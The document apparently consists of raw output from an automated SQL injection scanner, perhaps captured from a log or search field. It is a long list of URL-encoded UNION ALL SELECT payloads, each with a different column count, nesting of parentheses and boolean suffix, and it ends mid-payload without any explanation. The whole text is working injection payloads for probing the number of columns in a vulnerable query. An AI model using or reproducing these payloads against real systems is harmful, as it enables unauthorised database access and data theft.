-8627%22%29%20UNION%20ALL%20SELECT%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%23%20AND%20%28%22SPaM%22%3D%22SPaM -3357%22%29%20UNION%20ALL%20SELECT%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%2C%207563%23%20AND%20%28%22XhfH%22%3D%22XhfH -1379%22%29%29%20UNION%20ALL%20SELECT%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%2C%206638%23%20AND%20%28%28%22OedN%22%3D%22OedN -4597%22%29%29%20UNION%20ALL%20SELECT%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%2C%206394%23%20AND%20%28%28%22ttIS%22%3D%22ttIS -5509%22%29%29%20UNION%20ALL%20SELECT%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%2C%205598%23%20AND%20%28%28%22gpvD%22%3D%22gpvD -9318%22%29%29%20UNION%20ALL%20SELECT%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%2C%209031%23%20AND%20%28%28%22CFxN%22%3D%22CFxN -9274%22%29%29%20UNION%20ALL%20SELECT%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%2C%206573%23%20AND%20%28%28%22PVWY%22%3D%22PVWY -9476%22%29%29%20UNION%20ALL%20SELECT%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%23%20AND%20%28%28%22pojy%22%3D%22pojy -8593%22%29%29%20UNION%20ALL%20SELECT%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%2C%203129%23%20AND%20%28%28%22Xscz%22%3D%22Xscz -9075%22%29%29%20UNION%20ALL%20SELECT%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%2C%207231%23%20AND%20%28%28%22gURC%22%3D%22gURC -4196%22%29%29%20UNION%20ALL%20SELECT%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%2C%206827%23%20AND%20%28%28%22bMfX%22%3D%22bMfX -3140%22%29%29%20UNION%20ALL%20SELECT%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%23%20AND%20%28%28%22buPg%22%3D%22buPg -4005%22%29%29%29%20UNION%20ALL%20SELECT%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%2C%208687%23%20AND%20%28%28%28%22DolX%22%3D%22DolX -1698%22%29%29%29%20UNION%20ALL%20SELECT%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%2C%204233%23%20AND%20%28%28%28%22novs%22%3D%22novs -6852%22%29%29%29%20UNION%20ALL%20SELECT%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%2C%201060%23%20AND%20%28%28%28%22BHNp%22%3D%22BHNp -1700%22%29%29%29%20UNION%20ALL%20SELECT%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%23%20AND%20%28%28%28%22WIbu%22%3D%22WIbu -6581%22%29%29%29%20UNION%20ALL%20SELECT%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%2C%203245%23%20AND%20%28%28%28%22XiER%22%3D%22XiER -4278%22%29%29%29%20UNION%20ALL%20SELECT%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%2C%203870%23%20AND%20%28%28%28%22UKRx%22%3D%22UKRx -5077%22%29%29%29%20UNION%20ALL%20SELECT%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%2C%205434%23%20AND%20%28%28%28%22kpkF%22%3D%22kpkF -1039%22%29%29%29%20UNION%20ALL%20SELECT%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%23%20AND%20%28%28%28%22HRne%22%3D%22HRne -1390%22%29%29%29%20UNION%20ALL%20SELECT%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%2C%202267%23%20AND%20%28%28%28%22onwv%22%3D%22onwv -4669%22%29%29%29%20UNION%20ALL%20SELECT%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%23%20AND%20%28%28%28%22ezfs%22%3D%22ezfs -2980%22%20UNION%20ALL%20SELECT%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%23%20AND%20%22eGQA%22%3D%22eGQA -3417%22%20UNION%20ALL%20SELECT%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%23%20AND%20%22kTPY%22%3D%22kTPY -5278%22%20UNION%20ALL%20SELECT%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%2C%208849%23%20AND%20%22CIDI%22%3D%22CIDI -7821%22%20UNION%20ALL%20SELECT%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%23%20AND%20%22qPaF%22%3D%22qPaF -6597%22%20UNION%20ALL%20SELECT%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%2C%202581%23%20AND%20%22QaJs%22%3D%22QaJs -6838%22%20UNION%20ALL%20SELECT%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%2C%202668%23%20AND%20%22egNI%22%3D%22egNI -1674%22%20UNION%20ALL%20SELECT%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%23%20AND%20%22Bgjv%22%3D%22Bgjv -5520%22%20UNION%20ALL%20SELECT%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%2C%202636%23%20AND%20%22xfcm%22%3D%22xfcm -6898%22%20UNION%20ALL%20SELECT%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%23%20AND%20%22hrxt%22%3D%22hrxt -1674%22%20UNION%20ALL%20SELECT%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%2C%209435%23%20AND%20%22akuA%22%3D%22akuA -6193%22%29%20UNION%20ALL%20SELECT%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%23%20AND%20%28%22plNp%22%20LIKE%20%22plNp -5922%22%29%20UNION%20ALL%20SELECT%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%2C%202997%23%20AND%20%28%22PuuQ%22%20LIKE%20%22PuuQ -6612%22%29%20UNION%20ALL%20SELECT%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%23%20AND%20%28%22dYPM%22%20LIKE%20%22dYPM -7218%22%29%20UNION%20ALL%20SELECT%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%23%20AND%20%28%22Lojh%22%20LIKE%20%22Lojh -8793%22%29%20UNION%20ALL%20SELECT%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%23%20AND%20%28%22ObgW%22%20LIKE%20%22ObgW -8366%22%29%20UNION%20ALL%20SELECT%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%23%20AND%20%28%22SztA%22%20LIKE%20%22SztA -1301%22%29%20UNION%20ALL%20SELECT%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%23%20AND%20%28%22MeVu%22%20LIKE%20%22MeVu -4777%22%29%20UNION%20ALL%20SELECT%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%2C%202238%23%20AND%20%28%22fENz%22%20LIKE%20%22fENz -4595%22%29%20UNION%20ALL%20SELECT%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%2C%206400%23%20AND%20%28%22kbcR%22%20LIKE%20%22kbcR -1027%22%29%20UNION%20ALL%20SELECT%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%2C%207764%23%20AND%20%28%22HqoN%22%20LIKE%20%22HqoN -3922%22%29%29%20UNION%20ALL%20SELECT%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%23%20AND%20%28%28%22Ifcy%22%20LIKE%20%22Ifcy -3619%22%29%29%20UNION%20ALL%20SELECT%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%23%20AND%20%28%28%22vThE%22%20LIKE%20%22vThE -5912%22%29%29%20UNION%20ALL%20SELECT%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%2C%201567%23%20AND%20%28%28%22aZpw%22%20LIKE%20%22aZpw -4032%22%29%29%20UNION%20ALL%20SELECT%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%2C%201987%23%20AND%20%28%28%22RwxT%22%20LIKE%20%22RwxT -4568%22%29%29%20UNION%20ALL%20SELECT%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%23%20AND%20%28%28%22yIRY%22%20LIKE%20%22yIRY -4692%22%29%29%20UNION%20ALL%20SELECT%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%23%20AND%20%28%28%22sOzu%22%20LIKE%20%22sOzu -9086%22%29%29%20UNION%20ALL%20SELECT%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%2C%204854%23%20AND%20%28%28%22upuz%22%20LIKE%20%22upuz -4137%22%29%29%20UNION%20ALL%20SELECT%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%23%20AND%20%28%28%22sizJ%22%20LIKE%20%22sizJ -8216%22%29%29%20UNION%20ALL%20SELECT%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%23%20AND%20%28%28%22OFmv%22%20LIKE%20%22OFmv -4182%22%29%29%20UNION%20ALL%20SELECT%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%2C%205357%23%20AND%20%28%28%22NXVL%22%20LIKE%20%22NXVL -2975%22%29%29%29%20UNION%20ALL%20SELECT%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%2C%203369%23%20AND%20%28%28%28%22WVjv%22%20LIKE%20%22WVjv -5189%22%29%29%29%20UNION%20ALL%20SELECT%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%23%20AND%20%28%28%28%22MYRZ%22%20LIKE%20%22MYRZ -7251%22%29%29%29%20UNION%20ALL%20SELECT%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%2C%203970%23%20AND%20%28%28%28%22cBBK%22%20LIKE%20%22cBBK -3959%22%29%29%29%20UNION%20ALL%20SELECT%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%23%20AND%20%28%28%28%22PCBm%22%20LIKE%20%22PCBm 